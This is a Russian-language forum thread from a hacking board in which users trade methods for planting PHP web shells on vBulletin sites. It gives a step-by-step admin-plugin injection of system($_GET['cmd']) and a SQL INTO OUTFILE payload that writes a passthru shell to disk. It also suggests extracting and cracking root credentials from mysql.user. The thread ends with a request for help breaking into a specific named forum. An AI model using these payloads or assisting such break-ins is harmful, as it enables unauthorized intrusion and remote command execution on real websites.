ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Твой кролик пишет - произнеси на англиском 1000 раз, тогда появится возможность и записи и чтения.

флуд тут не нужен

если у тебя есть доступ к бд пробуй залить файл через into outfile, если не получится, попробуй извлечь логин и пасс рута из mysql.user, разшифруешь, подключишься к бд и снова попробуешь через into outfile

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

пробовал залить шел так
1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда

но ни чего не выходит смаилы тоже отдыхают у кого есть еще предложения

хоть кто то понял о чем я говорю какой запрос в базе надо выполнить что бы залить шел

select '<?php @passthru($_GET[cmd]); ?>' into outfile '/fullpatch/shell.php' from table
директория должна быть открыта на запись [-rwxrwxrwx]
from table иногда нужно иногда нет, table любая таблица

google на что, об этом не раз писали и видео много

народ помгаите взломать форум http://www.avatar-forums.com/ мне срочно нужно его ломануть или хотяб посмотрите может найдёте какие дыры